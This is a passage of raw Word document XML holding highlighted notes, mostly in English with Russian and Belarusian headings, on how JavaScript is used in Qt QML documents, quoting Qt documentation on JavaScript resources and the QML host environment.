          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF0849" w:rsidRPr="00D815C8" w:rsidRDefault="008F5A3F" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Application logic defined in JavaScript functions may be separated into separate JavaScript files known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00927375">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>several different kinds</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of JavaScript resources, with different semantics.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F5A3F" w:rsidRPr="00D815C8" w:rsidRDefault="008F5A3F" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML document may import JavaScript resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and JavaScript resources may import other JavaScript resources as well as QML modules. This allows an application developer to provide </w:t>
      </w:r>
      <w:r w:rsidRPr="00927375">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>application logic in modular</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, self-contained files</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F5A3F" w:rsidRPr="00D815C8" w:rsidRDefault="00777621"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The QML engine provides a JavaScript environment that has some differences to the JavaScript environment provided by a web browser. Certain limitations apply to code running in the environment, and the QML engine provides various objects in the root </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">context which may be unfamiliar to JavaScript developers. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Differences of web and QML JavaScrip</w:t>
      </w:r>
      <w:r w:rsidR="00927375">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E4201" w:rsidRPr="00D815C8" w:rsidRDefault="00D10A6A" w:rsidP="00927375">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc382058568"/>
      <w:bookmarkStart w:id="63" w:name="_Toc483000531"/>
      <w:bookmarkStart w:id="64" w:name="_Toc483603891"/>
      <w:bookmarkStart w:id="65" w:name="_Toc483605111"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JAVA SCRIPT</w:t>
      </w:r>
      <w:r w:rsidR="004E4201" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E4201" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ВЫРАЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidR="004E4201" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E4201" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="004E4201" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML</w:t>
      </w:r>
      <w:r w:rsidR="004E4201" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E4201" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ДОКУМЕНТАХ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-javascript-expressions.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="00517306"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The</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Host Environment</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 xml:space="preserve">provided by QML can run valid standard JavaScript constructs such as conditional operators, arrays, variable setting, loops. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In addition</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the standard JavaScript properties, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Global Object</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00927375">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>includes a number of helper methods that simplify building UIs and interacting with the QML environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00517306" w:rsidRPr="00D815C8" w:rsidRDefault="0032277F" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The JavaScript environment provided by QML is stricter than that in a web browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032277F" w:rsidRPr="00D815C8" w:rsidRDefault="0032277F" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, in QML you cannot add to, or modify, members of the JavaScript global object. In regular JavaScript, it is possible to do this accidentally by using a variable without declaring it. In QML this will throw an exception, so all local variables must be explicitly declared. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Абмежаванне асяроддзя </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00517306" w:rsidRPr="00D815C8" w:rsidRDefault="0032277F"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Various parts of</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML documents</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highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can contain JavaScript code</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032277F" w:rsidRPr="00927375" w:rsidRDefault="0032277F" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00927375">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>body of</w:t>
      </w:r>
      <w:r w:rsidRPr="00927375">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidRPr="00927375">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property bindings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00927375">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032277F" w:rsidRPr="00D815C8" w:rsidRDefault="0032277F" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00927375">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>body of</w:t>
      </w:r>
      <w:r w:rsidRPr="00927375">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:anchor="signal-attributes" w:history="1">
        <w:r w:rsidRPr="00927375">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Signal handlers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00517306" w:rsidRPr="00D815C8" w:rsidRDefault="0032277F" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00927375">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>definition of</w:t>
      </w:r>
      <w:r w:rsidRPr="00927375">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:anchor="method-attributes" w:history="1">
        <w:r w:rsidRPr="00927375">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
